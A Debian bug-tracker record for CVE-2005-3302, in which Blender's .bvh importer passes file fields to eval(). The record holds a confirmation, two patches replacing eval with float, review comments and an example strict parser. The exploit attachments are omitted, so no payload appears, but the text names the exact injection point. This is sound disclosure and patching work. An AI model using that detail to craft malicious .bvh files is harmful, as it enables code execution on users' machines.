Your message dated Wed, 16 Nov 2005 15:54:07 +0100 with message-id <[EMAIL PROTECTED]> and subject line Bug#330895: [CVE-2005-3302] blender: Arbitrary code execution when importing a .bvh file has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.)

Debian bug tracking system administrator (administrator, Debian Bugs database)

--------------------------------------
Received: (at submit) by bugs.debian.org; 30 Sep 2005 10:35:40 +0000

From: Joxean Koret <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Date: Fri, 30 Sep 2005 12:51:35 +0200
Subject: blender: Arbitrary code execution when importing a .bvh file

Package: blender
Version: 2.36-1
Severity: grave
Justification: user security hole

The bvh_import.py script supplied with the current Debian Stable and (I think) unstable versions of Blender is vulnerable to arbitrary code execution. The problem was corrected at 2005/01/22 in the CVS but the main package doesn't come with the fixed script.

Attached are the e-mail sent to the Blender people, one working exploit to test the vulnerability under Debian, and 2 proofs of concept.
Regards,
Joxean Koret

-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.11-1-386
Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15)

Versions of packages blender depends on:
ii gettext [libg 0.14.4-2 GNU Internationalization utilities
ii libc6 2.3.2.ds1-22 GNU C Library: Shared libraries an
ii libfreetype6 2.1.7-2.4 FreeType 2 font engine, shared lib
ii libgcc1 1:3.4.3-13 GCC support library
ii libjpeg62 6b-10 The Independent JPEG Group's JPEG
ii libopenal0 0.2004090900-1.1 OpenAL is a portable library for 3
ii libpng12-0 1.2.8rel-1 PNG library - runtime
ii libsdl1.2debi 1.2.7+1.2.8cvs20041007-4.1 Simple DirectMedia Layer
ii libstdc++5 1:3.3.5-13 The GNU Standard C++ Library v3
ii libx11-6 4.3.0.dfsg.1-14 X Window System protocol client li
ii python2.3 2.3.5-4 An interactive high-level object-o
ii xlibmesa-gl [ 4.3.0.dfsg.1-14 Mesa 3D graphics library [XFree86]
ii xlibmesa-glu 4.3.0.dfsg.1-14 Mesa OpenGL utility library [XFree
ii xlibs 4.3.0.dfsg.1-14 X Keyboard Extension (XKB) configu
ii zlib1g 1:1.2.2-4.sarge.2 compression library - runtime

-- no debconf information

[Attachments: exploit.bvh, first.mail.txt, poc1.bvh, poc2.bvh (base64-encoded bodies omitted); PGP signature omitted]
---------------------------------------
Received: (at 330895-done) by bugs.debian.org; 16 Nov 2005 14:54:16 +0000

From: Florian Ernst <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Date: Wed, 16 Nov 2005 15:54:07 +0100
Subject: Re: Bug#330895: [CVE-2005-3302] blender: Arbitrary code execution when importing a .bvh file
In-Reply-To: <[EMAIL PROTECTED]>

Package: blender
Version: 2.37a-1

Dear Security Team,

as this package's maintainer hasn't shown any visible reaction to this issue I now try to take care...

On Fri, 30 Sep 2005 12:51:35 +0200, Joxean Koret wrote:
> The bvh_import.py script supplied with the current Debian Stable and (I
> think) unstable versions of Blender is vulnerable to arbitrary code
> execution.

I can confirm that this particular vulnerability could trick a user into executing arbitrary commands with his rights. All an attacker has to do is to provide a specially crafted bvh file (used for Motion Capture data) for the user to import into a blender scene, and all commands contained therein will be executed in the user's environment. The demo exploit attached to Joxean's mail works under blender-2.36.

Oldstable (2.23-0.1) isn't affected as it shipped a version of blender that didn't include this script yet (and was in non-free).

Stable (2.36-1) is affected; I've attached two patches that remove all 'eval's in the script, which in fact basically is what upstream did. The first patch (CVE-2005-3302_upstream_dpatch.diff) essentially contains what upstream did to resolve this issue, while the second patch (CVE-2005-3302_dpatch.diff) contains what I considered to be a minimal set of changes to remove this particular vulnerability. Please see <http://projects.blender.org/viewcvs/viewcvs.cgi/blender/release/scripts/bvh_import.py.diff?r1=1.4&r2=1.5&cvsroot=bf-blender> for upstream details.
I can confirm that these changes prevent the exploit of this vulnerability, tested on both blender-2.36 and 2.37a.

Testing isn't affected anymore as blender has been removed from Testing due to general bugginess.

Unstable was partially affected: while 2.37a-1 already included the upstream fix for this problem this version hadn't been built on all archs due to bug#333958. However, this FTBFS has been resolved as of 2.37a-1.1, so right now all versions currently present in Unstable are _not_ vulnerable. Consequently I now close this bug for the corresponding version in Unstable with this mail.

Please issue an update for Stable when you think it is due time.

HTH,
Flo

[Attachment: CVE-2005-3302_upstream_dpatch.diff]
diff -u blender-2.36/debian/patches/00list blender-2.36/debian/patches/00li= st --- blender-2.36/debian/patches/00list +++ blender-2.36/debian/patches/00list @@ -2,0 +3 @@ +03_fix_arbitrary_code_execution_in_bvh_import.py diff -u blender-2.36/debian/changelog blender-2.36/debian/changelog --- blender-2.36/debian/changelog +++ blender-2.36/debian/changelog @@ -1,3 +1,12 @@ +blender (2.36-1sarge1) stable-security; urgency=3Dhigh + + * patch release/scripts/bvh_import.py to use float instead of eval by + adding 03_fix_arbitrary_code_execution_in_bvh_import.py.dpatch, + thus preventing arbitrary code execution when importing a .bvh file; + for reference, this is CVE-2005-3302 - closes: #330895 + + -- Florian Ernst <[EMAIL PROTECTED]> Wed, 16 Nov 2005 15:03:10 +0100 + blender (2.36-1) unstable; urgency=3Dhigh =20 * The "Back From The Gig" release. only in patch2: unchanged: --- blender-2.36.orig/debian/patches/03_fix_arbitrary_code_execution_in_bvh= _import.py.dpatch +++ blender-2.36/debian/patches/03_fix_arbitrary_code_execution_in_bvh_impo= rt.py.dpatch
@@ -0,0 +1,67 @@ +#! /bin/sh /usr/share/dpatch/dpatch-run +## 03_fix_arbitrary_code_execution_in_bvh_import.py.dpatch by Florian Erns= t <[EMAIL PROTECTED]> +## +## All lines beginning with `## DP:' are a description of the patch. +## DP: Fix for CVE-2005-3302, see bug#330895 and +## DP: <http://projects.blender.org/viewcvs/viewcvs.cgi/blender/release/sc= ripts/bvh_import.py.diff?r1=3D1.4&r2=3D1.5&cvsroot=3Dbf-blender> +## DP: <http://projects.blender.org/viewcvs/viewcvs.cgi/blender/release/sc= ripts/bvh_import.py.diff?r1=3D1.6&r2=3D1.7&cvsroot=3Dbf-blender> + [EMAIL PROTECTED]@ +diff -urNad blender-2.36~/release/scripts/bvh_import.py blender-2.36/relea= se/scripts/bvh_import.py +--- blender-2.36~/release/scripts/bvh_import.py 2004-11-07 17:31:13.000000= 000 +0100 ++++ blender-2.36/release/scripts/bvh_import.py 2005-11-16 15:08:35.0000000= 00 +0100 +@@ -331,7 +331,7 @@ + =20 + name =3D lines[lineIdx][1] + lineIdx +=3D 2 # Incriment to the next line (Offset) +- offset =3D ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]), eval= (lines[lineIdx][3]) ) ++ offset =3D ( float(lines[lineIdx][1]), float(lines[lineIdx][2]), fl= oat(lines[lineIdx][3]) ) + lineIdx +=3D 1 # Incriment to the next line (Channels) + =20 + # newChannel[Xposition, Yposition, Zposition, Xrotation, Yrotation,= Zrotation] +@@ -367,7 +367,7 @@ + # Account for an end node + if lines[lineIdx][0] =3D=3D 'End' and lines[lineIdx][1] =3D=3D 'Site'= : # There is somtimes a name afetr 'End Site' but we will ignore it. 
+ lineIdx +=3D 2 # Incriment to the next line (Offset) +- offset =3D ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]), eval= (lines[lineIdx][3]) ) ++ offset =3D ( float(lines[lineIdx][1]), float(lines[lineIdx][2]), fl= oat(lines[lineIdx][3]) ) + makeEnd(parent, prefix, offset) +=20 + # Just so we can remove the Parents in a uniform way- End end never= has kids +@@ -431,14 +431,32 @@ + if debug: Blender.Redraw()=20 + while obIdx < len(objectList) -1: + if channelList[obIdx][0] !=3D -1: +- objectList[obIdx].getIpo().getCurve('LocX').addBezier((curren= tFrame, scale * eval(lines[lineIdx][channelList[obIdx][0]]))) ++ VAL0=3Dlines[lineIdx][channelList[obIdx][0]] ++ if VAL0.find('.')=3D=3D-1: ++ VAL0=3DVAL0[:len(VAL0)-6]+'.'+VAL0[-6:] ++ objectList[obIdx].getIpo().getCurve('LocX').addBezier((curren= tFrame, scale * float(VAL0))) + if channelList[obIdx][1] !=3D -1: +- objectList[obIdx].getIpo().getCurve('LocY').addBezier((curren= tFrame, scale * eval(lines[lineIdx][channelList[obIdx][1]]))) ++ VAL1=3Dlines[lineIdx][channelList[obIdx][1]] ++ if VAL1.find('.')=3D=3D-1: ++ VAL1=3DVAL1[:len(VAL1)-6]+'.'+VAL1[-6:] ++ objectList[obIdx].getIpo().getCurve('LocY').addBezier((curren= tFrame, scale * float(VAL1))) + if channelList[obIdx][2] !=3D -1: +- objectList[obIdx].getIpo().getCurve('LocZ').addBezier((curren= tFrame, scale * eval(lines[lineIdx][channelList[obIdx][2]]))) ++ VAL2=3Dlines[lineIdx][channelList[obIdx][2]] ++ if VAL2.find('.')=3D=3D-1: ++ VAL2=3DVAL2[:len(VAL2)-6]+'.'+VAL2[-6:] ++ objectList[obIdx].getIpo().getCurve('LocZ').addBezier((curren= tFrame, scale * float(VAL2))) + =20 + if channelList[obIdx][3] !=3D '-1' or channelList[obIdx][4] != =3D '-1' or channelList[obIdx][5] !=3D '-1': +- x, y, z =3D eulerRotate(eval(lines[lineIdx][channelList[obIdx= ][3]]), eval(lines[lineIdx][channelList[obIdx][4]]), eval(lines[lineIdx][ch= annelList[obIdx][5]])) ++ VAL3=3Dlines[lineIdx][channelList[obIdx][3]] ++ if VAL3.find('.')=3D=3D-1: ++ 
VAL3=3DVAL3[:len(VAL3)-6]+'.'+VAL3[-6:] ++ VAL4=3Dlines[lineIdx][channelList[obIdx][4]] ++ if VAL4.find('.')=3D=3D-1: ++ VAL4=3DVAL4[:len(VAL4)-6]+'.'+VAL4[-6:] ++ VAL5=3Dlines[lineIdx][channelList[obIdx][5]] ++ if VAL5.find('.')=3D=3D-1: ++ VAL5=3DVAL5[:len(VAL5)-6]+'.'+VAL5[-6:] ++ x, y, z =3D eulerRotate(float(VAL3), float(VAL4), float(VAL5)) + objectList[obIdx].getIpo().getCurve('RotX').addBezier((curren= tFrame, x)) + objectList[obIdx].getIpo().getCurve('RotY').addBezier((curren= tFrame, y)) + objectList[obIdx].getIpo().getCurve('RotZ').addBezier((curren= tFrame, z))

[Attachment: CVE-2005-3302_dpatch.diff]
diff -u blender-2.36/debian/patches/00list blender-2.36/debian/patches/00li= st --- blender-2.36/debian/patches/00list +++ blender-2.36/debian/patches/00list @@ -2,0 +3 @@ +03_fix_arbitrary_code_execution_in_bvh_import.py diff -u blender-2.36/debian/changelog blender-2.36/debian/changelog --- blender-2.36/debian/changelog +++ blender-2.36/debian/changelog
@@ -1,3 +1,15 @@ +blender (2.36-1sarge1) stable-security; urgency=3Dhigh + + * patch release/scripts/bvh_import.py to use float instead of eval by + adding 03_fix_arbitrary_code_execution_in_bvh_import.py.dpatch, + thus preventing arbitrary code execution when importing a .bvh file; + this fix differs from the changes in + <http://projects.blender.org/viewcvs/viewcvs.cgi/blender/release/scrip= ts/bvh_import.py.diff?r1=3D1.4&r2=3D1.5&cvsroot=3Dbf-blender> + in that it doesn't provide the new checks introduced therein; + for reference, this is CVE-2005-3302 - closes: #330895 + + -- Florian Ernst <[EMAIL PROTECTED]> Wed, 16 Nov 2005 14:45:57 +0100 + blender (2.36-1) unstable; urgency=3Dhigh =20 * The "Back From The Gig" release. only in patch2: unchanged: --- blender-2.36.orig/debian/patches/03_fix_arbitrary_code_execution_in_bvh= _import.py.dpatch +++ blender-2.36/debian/patches/03_fix_arbitrary_code_execution_in_bvh_impo= rt.py.dpatch 
@@ -0,0 +1,47 @@ +#! /bin/sh /usr/share/dpatch/dpatch-run +## 03_fix_arbitrary_code_execution_in_bvh_import.py.dpatch by Florian Erns= t <[EMAIL PROTECTED]> +## +## All lines beginning with `## DP:' are a description of the patch. +## DP: Fix for CVE-2005-3302, see bug#330895 + [EMAIL PROTECTED]@ +diff -urNad blender-2.36~/release/scripts/bvh_import.py blender-2.36/relea= se/scripts/bvh_import.py +--- blender-2.36~/release/scripts/bvh_import.py 2004-11-07 17:31:13.000000= 000 +0100 ++++ blender-2.36/release/scripts/bvh_import.py 2005-11-02 13:36:01.0000000= 00 +0100 +@@ -331,7 +331,7 @@ + =20 + name =3D lines[lineIdx][1] + lineIdx +=3D 2 # Incriment to the next line (Offset) +- offset =3D ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]), eval= (lines[lineIdx][3]) ) ++ offset =3D ( float(lines[lineIdx][1]), float(lines[lineIdx][2]), fl= oat(lines[lineIdx][3]) ) + lineIdx +=3D 1 # Incriment to the next line (Channels) + =20 + # newChannel[Xposition, Yposition, Zposition, Xrotation, Yrotation,= Zrotation] +@@ -367,7 +367,7 @@ + # Account for an end node + if lines[lineIdx][0] =3D=3D 'End' and lines[lineIdx][1] =3D=3D 'Site'= : # There is somtimes a name afetr 'End Site' but we will ignore it. 
+ lineIdx +=3D 2 # Incriment to the next line (Offset) +- offset =3D ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]), eval= (lines[lineIdx][3]) ) ++ offset =3D ( float(lines[lineIdx][1]), float(lines[lineIdx][2]), fl= oat(lines[lineIdx][3]) ) + makeEnd(parent, prefix, offset) +=20 + # Just so we can remove the Parents in a uniform way- End end never= has kids +@@ -431,14 +431,14 @@ + if debug: Blender.Redraw()=20 + while obIdx < len(objectList) -1: + if channelList[obIdx][0] !=3D -1: +- objectList[obIdx].getIpo().getCurve('LocX').addBezier((curren= tFrame, scale * eval(lines[lineIdx][channelList[obIdx][0]]))) ++ objectList[obIdx].getIpo().getCurve('LocX').addBezier((curren= tFrame, scale * float(lines[lineIdx][channelList[obIdx][0]]))) + if channelList[obIdx][1] !=3D -1: +- objectList[obIdx].getIpo().getCurve('LocY').addBezier((curren= tFrame, scale * eval(lines[lineIdx][channelList[obIdx][1]]))) ++ objectList[obIdx].getIpo().getCurve('LocY').addBezier((curren= tFrame, scale * float(lines[lineIdx][channelList[obIdx][1]]))) + if channelList[obIdx][2] !=3D -1: +- objectList[obIdx].getIpo().getCurve('LocZ').addBezier((curren= tFrame, scale * eval(lines[lineIdx][channelList[obIdx][2]]))) ++ objectList[obIdx].getIpo().getCurve('LocZ').addBezier((curren= tFrame, scale * float(lines[lineIdx][channelList[obIdx][2]]))) + =20 + if channelList[obIdx][3] !=3D '-1' or channelList[obIdx][4] != =3D '-1' or channelList[obIdx][5] !=3D '-1': +- x, y, z =3D eulerRotate(eval(lines[lineIdx][channelList[obIdx= ][3]]), eval(lines[lineIdx][channelList[obIdx][4]]), eval(lines[lineIdx][ch= annelList[obIdx][5]])) ++ x, y, z =3D eulerRotate(float(lines[lineIdx][channelList[obId= x][3]]), float(lines[lineIdx][channelList[obIdx][4]]), float(lines[lineIdx]= [channelList[obIdx][5]])) + objectList[obIdx].getIpo().getCurve('RotX').addBezier((curren= tFrame, x)) + objectList[obIdx].getIpo().getCurve('RotY').addBezier((curren= tFrame, y)) + 
objectList[obIdx].getIpo().getCurve('RotZ').addBezier((curren= tFrame, z))
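Review bot: the changelog entry in CVE-2005-3302_upstream_dpatch.diff says only "patch release/scripts/bvh_import.py to use float instead of eval", but the dpatch it adds also carries upstream's rewrite of MOTION values that contain no '.' (`VAL0=VAL0[:len(VAL0)-6]+'.'+VAL0[-6:]`), which changes how integer-looking channel values are read; add a line to the entry naming that behavioural change so that stable users can tell the two candidate uploads apart from the changelog alone.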
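Review bot: in the @@ -331,7 +331,7 @@ and @@ -367,7 +367,7 @@ hunks of the embedded bvh_import.py diff, `float(lines[lineIdx][1])` replaces `eval` one for one, so a non-numeric OFFSET field now raises a ValueError that nothing in the visible code catches; failing loudly is the right direction compared with executing the field, but a `try: ... except ValueError:` around the conversion that names the offending line would turn a bare traceback into a readable "malformed .bvh file" error. Note that float() still accepts "inf" and "nan", so the change closes the code-execution hole without otherwise tightening what counts as a number.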
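Review bot: the `if VAL0.find('.')==-1: VAL0=VAL0[:len(VAL0)-6]+'.'+VAL0[-6:]` rewrite in the @@ -431,14 +431,32 @@ hunk assumes every value without a '.' is a fixed-point integer carrying six implied decimals, so a value of `12` becomes `.12` and `1e5` becomes `.1e5`; if that is intended upstream behaviour for the motion-capture files it was written for, a comment saying so belongs next to it, and the six identical copies of the three-line pattern would be clearer and easier to audit as one helper function called from each site.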
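Review bot: the @@ -431,14 +431,14 @@ hunk of CVE-2005-3302_dpatch.diff is the strict one-for-one eval-to-float swap and is the easier of the two patches to audit, but its context lines show rotation channels tested with `channelList[obIdx][3] != '-1'` (a string) while position channels are tested with `channelList[obIdx][0] != -1` (an int); if channelList holds ints, as the position test suggests, the rotation condition is always true and a skeleton without rotation channels feeds `lines[lineIdx][-1]`, the last value on the line, into eulerRotate. That is pre-existing rather than introduced here, but since these lines are being touched in a security upload it is worth fixing alongside.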
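As an added illustration of the parsing discipline both patches move toward, the following Python 3 parser (example code written for this page, not Blender's bvh_import.py or either dpatch) reads the HIERARCHY offsets and MOTION frames of a .bvh file through a strict numeric check, so a field containing Python code is rejected instead of evaluated. The `parse_bvh` and `to_float` names, the `BvhError` class and both sample inputs are constructed for the example.

```python
import re

# Strict numeric literal; narrower than float(): "inf", "nan", "1_000" and Python code are rejected.
_NUMBER_RE = re.compile(r"^[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?$")


class BvhError(ValueError):
    """Raised for any .bvh field that is not a plain numeric literal."""


def to_float(token):
    """Convert one .bvh field to float without ever evaluating it as code."""
    if not _NUMBER_RE.match(token):
        raise BvhError("non-numeric field in .bvh file: %r" % token)
    return float(token)


def parse_bvh(text):
    """Return (offsets, frame_time, frames); offsets maps joint name -> (x, y, z).
    Every numeric field goes through to_float(), so a field holding Python code
    raises BvhError instead of being executed (the eval() defect in CVE-2005-3302)."""
    lines = [ln.split() for ln in text.splitlines() if ln.strip()]
    if not lines or lines[0][0] != "HIERARCHY":
        raise BvhError("missing HIERARCHY header")
    offsets, stack, i = {}, [], 1                # stack: names of open blocks
    while i < len(lines) and lines[i][0] != "MOTION":
        tok = lines[i]
        if tok[0] in ("ROOT", "JOINT"):
            if len(tok) != 2:
                raise BvhError("malformed %s on line %d" % (tok[0], i + 1))
            stack.append(tok[1])
        elif tok[:2] == ["End", "Site"] and stack:   # leaf block under a joint
            stack.append(stack[-1] + "_end")
        elif tok[0] == "OFFSET":
            if len(tok) != 4 or not stack:
                raise BvhError("malformed OFFSET on line %d" % (i + 1))
            offsets[stack[-1]] = tuple(to_float(v) for v in tok[1:])
        elif tok[0] == "}":
            if not stack:
                raise BvhError("unbalanced braces")
            stack.pop()
        i += 1                          # "{" and CHANNELS lines carry no geometry
    if stack or i + 2 >= len(lines):
        raise BvhError("unterminated hierarchy or missing MOTION section")
    hdr_n, hdr_t = lines[i + 1], lines[i + 2]
    if hdr_n[0] != "Frames:" or not hdr_n[-1].isdigit() \
            or hdr_t[:2] != ["Frame", "Time:"]:
        raise BvhError("malformed MOTION header")
    n, frame_time = int(hdr_n[-1]), to_float(hdr_t[-1])
    frames = [[to_float(v) for v in row] for row in lines[i + 3:i + 3 + n]]
    if len(frames) != n:
        raise BvhError("expected %d frames, found %d" % (n, len(frames)))
    return offsets, frame_time, frames


# Constructed sample input (not from the page): a one-joint skeleton, two frames.
GOOD_BVH = """HIERARCHY
ROOT Hips
{
  OFFSET 0.0 0.0 0.0
  CHANNELS 3 Xposition Yposition Zposition
  End Site
  {
    OFFSET 0.0 18.0 0.0
  }
}
MOTION
Frames: 2
Frame Time: 0.033333
0.0 35.0 0.0
1.0 35.5 -0.5
"""
# Constructed malformed input: an OFFSET field that is Python code, not a number.
BAD_BVH = GOOD_BVH.replace("OFFSET 0.0 18.0 0.0", "OFFSET 0.0 1+1 0.0")
```

Running `parse_bvh(BAD_BVH)` raises BvhError at the OFFSET line, whereas the original importer would have handed the same field to eval().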